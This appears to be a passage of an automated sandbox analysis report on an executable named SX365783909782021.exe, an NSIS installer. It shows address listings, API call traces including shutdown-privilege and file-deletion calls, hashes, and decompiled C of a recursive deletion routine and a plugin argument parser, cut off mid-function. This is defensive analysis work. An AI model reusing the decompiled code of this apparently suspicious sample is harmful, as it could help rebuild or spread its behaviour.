                                                                                        0x0040336b
                                                                                        0x00403370
                                                                                        0x00403370
                                                                                        0x0040337b
                                                                                        0x00403381
                                                                                        0x00403386
                                                                                        0x00403388
                                                                                        0x004033aa
                                                                                        0x004033af
                                                                                        0x004033b6
                                                                                        0x004033bd
                                                                                        0x004033c1
                                                                                        0x00403428
                                                                                        0x00403428
                                                                                        0x0040342d
                                                                                        0x00403437
                                                                                        0x00403522
                                                                                        0x00403528
                                                                                        0x00403533
                                                                                        0x0040353c
                                                                                        0x0040353e
                                                                                        0x00403543
                                                                                        0x00403545
                                                                                        0x00403547
                                                                                        0x00403549
                                                                                        0x0040354b
                                                                                        0x0040354d
                                                                                        0x0040354f
                                                                                        0x0040355f
                                                                                        0x00403561
                                                                                        0x00403563
                                                                                        0x00403570
                                                                                        0x0040357f
                                                                                        0x00403587
                                                                                        0x0040358f
                                                                                        0x0040358f
                                                                                        0x00403563
                                                                                        0x0040354f
                                                                                        0x0040354b
                                                                                        0x00403594
                                                                                        0x0040359a
                                                                                        0x0040359c
                                                                                        0x004035a0
                                                                                        0x004035a0
                                                                                        0x0040359c
                                                                                        0x004035a5
                                                                                        0x004035aa
                                                                                        0x004035ad
                                                                                        0x004035af
                                                                                        0x004035af
                                                                                        0x004035b7
                                                                                        0x004035b7
                                                                                        0x00403446
                                                                                        0x0040344d
                                                                                        0x0040344d
                                                                                        0x004033c9
                                                                                        0x00403418
                                                                                        0x00403418
                                                                                        0x00403424
                                                                                        0x00000000
                                                                                        0x00403424
                                                                                        0x004033d2
                                                                                        0x004033df
                                                                                        0x004033d6
                                                                                        0x004033dc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004033de
                                                                                        0x004033de
                                                                                        0x004033de
                                                                                        0x004033e3
                                                                                        0x004033e5
                                                                                        0x004033ed
                                                                                        0x00403459
                                                                                        0x0040346d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403471
                                                                                        0x00403478
                                                                                        0x0040347e
                                                                                        0x00403484
                                                                                        0x0040348c
                                                                                        0x0040348c
                                                                                        0x0040349a
                                                                                        0x004034a1
                                                                                        0x004034aa
                                                                                        0x004034b0
                                                                                        0x004034bc
                                                                                        0x004034c2
                                                                                        0x004034cc
                                                                                        0x004034e0
                                                                                        0x004034e1
                                                                                        0x004034e2
                                                                                        0x004034f3
                                                                                        0x004034f9
                                                                                        0x00403500
                                                                                        0x00403503
                                                                                        0x00403509
                                                                                        0x00403509
                                                                                        0x00403500
                                                                                        0x0040350d
                                                                                        0x00403513
                                                                                        0x00403513
                                                                                        0x00403516
                                                                                        0x00403517
                                                                                        0x00403518
                                                                                        0x00000000
                                                                                        0x00403518
                                                                                        0x004033ef
                                                                                        0x004033f1
                                                                                        0x004033fc
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00403404
                                                                                        0x0040340f
                                                                                        0x00403414
                                                                                        0x00000000
                                                                                        0x00403414
                                                                                        0x00403390
                                                                                        0x0040339c
                                                                                        0x004033a1
                                                                                        0x004033a6
                                                                                        0x004033a8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004033a8
                                                                                        0x00000000
                                                                                        0x00403345
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004032f9
                                                                                        0x004032f9
                                                                                        0x004032f9
                                                                                        0x004032fa
                                                                                        0x004032fa
                                                                                        0x00000000
                                                                                        0x004032f9
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • #17.COMCTL32 ref: 0040325B
                                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403266
                                                                                        • OleInitialize.OLE32(00000000), ref: 0040326D
                                                                                          • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                          • Part of subcall function 00405E88: LoadLibraryA.KERNELBASE(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                          • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                        • SHGetFileInfoA.SHELL32(0041F458,00000000,?,00000160,00000000,00000008), ref: 00403295
                                                                                          • Part of subcall function 00405B66: lstrcpynA.KERNEL32(?,?,00000400,004032AA,004236A0,NSIS Error), ref: 00405B73
                                                                                        • GetCommandLineA.KERNEL32(004236A0,NSIS Error), ref: 004032AA
                                                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\SX365783909782021.exe" ,00000000), ref: 004032BD
                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\SX365783909782021.exe" ,00000020), ref: 004032E8
                                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 0040337B
                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403390
                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339C
                                                                                        • DeleteFileA.KERNELBASE(1033), ref: 004033AF
                                                                                        • OleUninitialize.OLE32(00000000), ref: 0040342D
                                                                                        • ExitProcess.KERNEL32 ref: 0040344D
                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\SX365783909782021.exe" ,00000000,00000000), ref: 00403459
                                                                                        • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\SX365783909782021.exe" ,00000000,00000000), ref: 00403465
                                                                                        • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403471
                                                                                        • SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403478
                                                                                        • DeleteFileA.KERNEL32(0041F058,0041F058,?,00424000,?), ref: 004034C2
                                                                                        • CopyFileA.KERNEL32(C:\Users\user\Desktop\SX365783909782021.exe,0041F058,00000001), ref: 004034D6
                                                                                        • CloseHandle.KERNEL32(00000000,0041F058,0041F058,?,0041F058,00000000), ref: 00403503
                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403558
                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00403594
                                                                                        • ExitProcess.KERNEL32 ref: 004035B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                        • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\SX365783909782021.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SX365783909782021.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                        • API String ID: 2278157092-3125591416
                                                                                        • Opcode ID: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
                                                                                        • Instruction ID: d9df3101e86bd055252ea398e1a167ecdf9755d8b7b18b8fa076e16bcd865dbe
                                                                                        • Opcode Fuzzy Hash: b237e16242222b526cfbc7eec5e85b12329012a3d6ce1955aa8a6be5a5dec380
                                                                                        • Instruction Fuzzy Hash: E191D231A087417EE7216F609D49B2B7EACEB01306F44457BF941B61E2C77CAE058B6E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040548B, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 94%
                                                                                        			E0040548B(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040573A(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405B66(0x4214a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004056A0(_t72);
					} else {
						lstrcatA(0x4214a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E00405684( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405B66(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040581E(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404F04(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404F04(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004058B4();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040548B(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a8 - 0x5c;
					if( *0x4214a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405E61(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405659(_t72);
							E0040581E(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404F04(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404F04(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004058B4();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                                                                                        0x00405496
                                                                                        0x0040549a
                                                                                        0x004054a3
                                                                                        0x004054a6
                                                                                        0x004054a9
                                                                                        0x004054b1
                                                                                        0x004054b3
                                                                                        0x004054b4
                                                                                        0x00000000
                                                                                        0x004054b4
                                                                                        0x004054c3
                                                                                        0x004054c3
                                                                                        0x004054c6
                                                                                        0x004054c9
                                                                                        0x004054dd
                                                                                        0x004054e4
                                                                                        0x004054e9
                                                                                        0x004054eb
                                                                                        0x004054fb
                                                                                        0x004054ed
                                                                                        0x004054f3
                                                                                        0x004054f3
                                                                                        0x00405500
                                                                                        0x00405503
                                                                                        0x0040550e
                                                                                        0x00405514
                                                                                        0x00405519
                                                                                        0x00405529
                                                                                        0x0040552b
                                                                                        0x00405531
                                                                                        0x00405534
                                                                                        0x00405537
                                                                                        0x004055f4
                                                                                        0x004055f4
                                                                                        0x004055f8
                                                                                        0x004055fa
                                                                                        0x004055fa
                                                                                        0x004055fa
                                                                                        0x004055fa
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040553d
                                                                                        0x0040553d
                                                                                        0x00405546
                                                                                        0x0040554c
                                                                                        0x00405551
                                                                                        0x00405554
                                                                                        0x00405556
                                                                                        0x0040555a
                                                                                        0x0040555c
                                                                                        0x0040555c
                                                                                        0x0040555a
                                                                                        0x0040555f
                                                                                        0x00405562
                                                                                        0x00405575
                                                                                        0x00405577
                                                                                        0x0040557c
                                                                                        0x00405583
                                                                                        0x0040559b
                                                                                        0x004055a1
                                                                                        0x004055a7
                                                                                        0x004055a9
                                                                                        0x004055ce
                                                                                        0x004055ab
                                                                                        0x004055ab
                                                                                        0x004055af
                                                                                        0x004055c3
                                                                                        0x004055b1
                                                                                        0x004055b4
                                                                                        0x004055b9
                                                                                        0x004055bb
                                                                                        0x004055bc
                                                                                        0x004055bc
                                                                                        0x004055af
                                                                                        0x00405585
                                                                                        0x0040558b
                                                                                        0x0040558d
                                                                                        0x00405593
                                                                                        0x00405593
                                                                                        0x0040558d
                                                                                        0x00000000
                                                                                        0x00405583
                                                                                        0x00405564
                                                                                        0x00405567
                                                                                        0x00405569
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040556b
                                                                                        0x0040556d
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040556f
                                                                                        0x00405573
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004055d3
                                                                                        0x004055dd
                                                                                        0x004055e3
                                                                                        0x004055e3
                                                                                        0x004055ee
                                                                                        0x00000000
                                                                                        0x004055ee
                                                                                        0x00405505
                                                                                        0x0040550c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004054cb
                                                                                        0x004054cb
                                                                                        0x004054cd
                                                                                        0x004055fe
                                                                                        0x00405601
                                                                                        0x00405604
                                                                                        0x00405656
                                                                                        0x00405656
                                                                                        0x00405656
                                                                                        0x00405606
                                                                                        0x00405609
                                                                                        0x00405614
                                                                                        0x00405619
                                                                                        0x0040561b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040561e
                                                                                        0x00405624
                                                                                        0x0040562a
                                                                                        0x00405630
                                                                                        0x00405632
                                                                                        0x00000000
                                                                                        0x0040564e
                                                                                        0x00405634
                                                                                        0x00405638
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0040563d
                                                                                        0x00405642
                                                                                        0x00405643
                                                                                        0x00000000
                                                                                        0x00405644
                                                                                        0x0040560b
                                                                                        0x0040560b
                                                                                        0x00000000
                                                                                        0x0040560b
                                                                                        0x004054d3
                                                                                        0x004054d7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x004054d7

                                                                                        APIs
                                                                                        • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\SX365783909782021.exe" ,74B5F560), ref: 004054A9
                                                                                        • lstrcatA.KERNEL32(004214A8,\*.*,004214A8,?,00000000,?,"C:\Users\user\Desktop\SX365783909782021.exe" ,74B5F560), ref: 004054F3
                                                                                        • lstrcatA.KERNEL32(?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\SX365783909782021.exe" ,74B5F560), ref: 00405514
                                                                                        • lstrlenA.KERNEL32(?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\SX365783909782021.exe" ,74B5F560), ref: 0040551A
                                                                                        • FindFirstFileA.KERNEL32(004214A8,?,?,?,00409010,?,004214A8,?,00000000,?,"C:\Users\user\Desktop\SX365783909782021.exe" ,74B5F560), ref: 0040552B
                                                                                        • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004055DD
                                                                                        • FindClose.KERNEL32(?), ref: 004055EE
                                                                                        Strings
                                                                                        • \*.*, xrefs: 004054ED
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040548B
                                                                                        • "C:\Users\user\Desktop\SX365783909782021.exe" , xrefs: 00405495
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.210545063.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.210539038.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210567072.0000000000407000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210575310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210598812.0000000000422000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210616720.0000000000429000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000000.00000002.210650556.000000000042C000.00000002.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                        • String ID: "C:\Users\user\Desktop\SX365783909782021.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                                                                                        • API String ID: 2035342205-2358724209
                                                                                        • Opcode ID: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
                                                                                        • Instruction ID: bc429f5d1e1b14784ce7e3564347ec6ed469848bfd5577fff983359c073685a4
                                                                                        • Opcode Fuzzy Hash: 6c8ee5a3fe02bedcc3e1648cc4c34db6c3543f7bd00f265664a9289eb0c65dd6
                                                                                        • Instruction Fuzzy Hash: 0351F331904A447ADB216B218C45BBF3B79CF42728F54847BF905711E2CB3C5A82DE6E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 73761A98, Relevance: 20.1, APIs: 13, Instructions: 591stringlibrarymemoryCOMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 95%
                                                                                        			E73761A98() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				CHAR* _v24;
				CHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				CHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				CHAR* _t207;
				signed int _t210;
				void* _t212;
				void* _t214;
				CHAR* _t216;
				void* _t224;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t228;
				signed short _t230;
				struct HINSTANCE__* _t233;
				struct HINSTANCE__* _t235;
				void* _t236;
				char* _t237;
				void* _t248;
				signed char _t249;
				signed int _t250;
				void* _t254;
				struct HINSTANCE__* _t256;
				void* _t257;
				signed int _t259;
				intOrPtr _t260;
				char* _t263;
				signed int _t268;
				signed int _t271;
				signed int _t273;
				void* _t276;
				void* _t280;
				struct HINSTANCE__* _t282;
				intOrPtr _t285;
				void _t286;
				signed int _t287;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				void* _t304;
				signed int _t308;
				signed int _t311;
				signed int _t314;
				signed int _t315;
				signed int _t316;
				intOrPtr _t319;
				intOrPtr* _t320;
				CHAR* _t321;
				CHAR* _t323;
				CHAR* _t324;
				struct HINSTANCE__* _t325;
				void* _t327;
				signed int _t328;
				void* _t329;

				_t282 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t329 = 0;
				_v52 = 0;
				_v44 = 0;
				_t207 = E73761215();
				_v24 = _t207;
				_v28 = _t207;
				_v48 = E73761215();
				_t320 = E7376123B();
				_v56 = _t320;
				_v12 = _t320;
				while(1) {
					_t210 = _v32;
					_v60 = _t210;
					if(_t210 != _t282 && _t329 == _t282) {
						break;
					}
					_t319 =  *_t320;
					_t285 = _t319;
					_t212 = _t285 - _t282;
					if(_t212 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t214 = _v60 - _t282;
						if(_t214 == 0) {
							 *_v28 =  *_v28 & 0x00000000;
							__eflags = _t329 - _t282;
							if(_t329 == _t282) {
								_t254 = GlobalAlloc(0x40, 0x14a4); // executed
								_t329 = _t254;
								 *(_t329 + 0x810) = _t282;
								 *(_t329 + 0x814) = _t282;
							}
							_t286 = _v36;
							_t47 = _t329 + 8; // 0x8
							_t216 = _t47;
							_t48 = _t329 + 0x408; // 0x408
							_t321 = _t48;
							 *_t329 = _t286;
							 *_t216 =  *_t216 & 0x00000000;
							 *(_t329 + 0x808) = _t282;
							 *_t321 =  *_t321 & 0x00000000;
							_t287 = _t286 - _t282;
							__eflags = _t287;
							 *(_t329 + 0x80c) = _t282;
							 *(_t329 + 4) = _t282;
							if(_t287 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t327 = 0;
								GlobalFree(_t329);
								_t329 = E737612FE(_v24);
								__eflags = _t329 - _t282;
								if(_t329 == _t282) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t248 =  *(_t329 + 0x14a0);
									__eflags = _t248 - _t282;
									if(_t248 == _t282) {
										break;
									}
									_t327 = _t329;
									_t329 = _t248;
									__eflags = _t329 - _t282;
									if(_t329 != _t282) {
										continue;
									}
									break;
								}
								__eflags = _t327 - _t282;
								if(_t327 != _t282) {
									 *(_t327 + 0x14a0) = _t282;
								}
								_t249 =  *(_t329 + 0x810);
								__eflags = _t249 & 0x00000008;
								if((_t249 & 0x00000008) == 0) {
									_t250 = _t249 | 0x00000002;
									__eflags = _t250;
									 *(_t329 + 0x810) = _t250;
								} else {
									_t329 = E73761534(_t329);
									 *(_t329 + 0x810) =  *(_t329 + 0x810) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t299 = _t287 - 1;
								__eflags = _t299;
								if(_t299 == 0) {
									L31:
									lstrcpyA(_t216, _v48);
									L32:
									lstrcpyA(_t321, _v24);
									goto L42;
								}
								_t300 = _t299 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									goto L32;
								}
								__eflags = _t300 != 1;
								if(_t300 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t214 == 1) {
								_t256 = _v16;
								if(_v40 == _t282) {
									_t256 = _t256 - 1;
								}
								 *(_t329 + 0x814) = _t256;
							}
							L42:
							_v12 = _v12 + 1;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t320 = _v12;
								continue;
							}
							break;
						}
					}
					_t257 = _t212 - 0x23;
					if(_t257 == 0) {
						__eflags = _t320 - _v56;
						if(_t320 <= _v56) {
							L17:
							__eflags = _v44 - _t282;
							if(_v44 != _t282) {
								L43:
								_t259 = _v32 - _t282;
								__eflags = _t259;
								if(_t259 == 0) {
									_t260 = _t319;
									while(1) {
										__eflags = _t260 - 0x22;
										if(_t260 != 0x22) {
											break;
										}
										_t320 = _t320 + 1;
										__eflags = _v44 - _t282;
										_v12 = _t320;
										if(_v44 == _t282) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[1]);
											 *_v28 =  *_t320;
											L58:
											_t328 = _t320 + 1;
											__eflags = _t328;
											_v12 = _t328;
											goto L59;
										}
										_t260 =  *_t320;
										_v44 = _t282;
									}
									__eflags = _t260 - 0x2a;
									if(_t260 == 0x2a) {
										_v36 = 2;
										L57:
										_t320 = _v12;
										_v28 = _v24;
										_t282 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t260 - 0x2d;
									if(_t260 == 0x2d) {
										L151:
										_t303 =  *_t320;
										__eflags = _t303 - 0x2d;
										if(_t303 != 0x2d) {
											L154:
											_t263 = _t320 + 1;
											__eflags =  *_t263 - 0x3a;
											if( *_t263 != 0x3a) {
												goto L162;
											}
											__eflags = _t303 - 0x2d;
											if(_t303 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t263;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 =  *_v48 & 0x00000000;
											} else {
												 *_v28 =  *_v28 & 0x00000000;
												lstrcpyA(_v48, _v24);
											}
											goto L57;
										}
										_t263 = _t320 + 1;
										__eflags =  *_t263 - 0x3e;
										if( *_t263 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t260 - 0x3a;
									if(_t260 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t268 = _t259 - 1;
								__eflags = _t268;
								if(_t268 == 0) {
									L80:
									_t304 = _t285 + 0xffffffde;
									__eflags = _t304 - 0x55;
									if(_t304 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t304 + 0x73762259) & 0x000000ff) * 4 +  &M737621CD))) {
										case 0:
											__eax = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												L131:
												__eflags =  *(__edi + 1) - __dl;
												if( *(__edi + 1) != __dl) {
													L136:
													 *__eax =  *__eax & 0x00000000;
													__eax = E73761224(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __cl;
												if(__cl == 0) {
													goto L136;
												}
												__eflags = __cl - __dl;
												if(__cl == __dl) {
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__cl =  *__edi;
												 *__eax =  *__edi;
												__eax = __eax + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__cl =  *__edi;
												__eflags = __cl - __dl;
												if(__cl != __dl) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 1;
											__ebx = E73761215();
											 &_v12 = E73761A36( &_v12);
											__eax = E73761429(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E73761A36( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eflags = 0;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t270 =  *(_t329 + 0x814);
											__eflags = _t270 - _v16;
											if(_t270 > _v16) {
												_v16 = _t270;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t270 - (_v36 == 3);
											if(_t270 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E73761A36( &_v12);
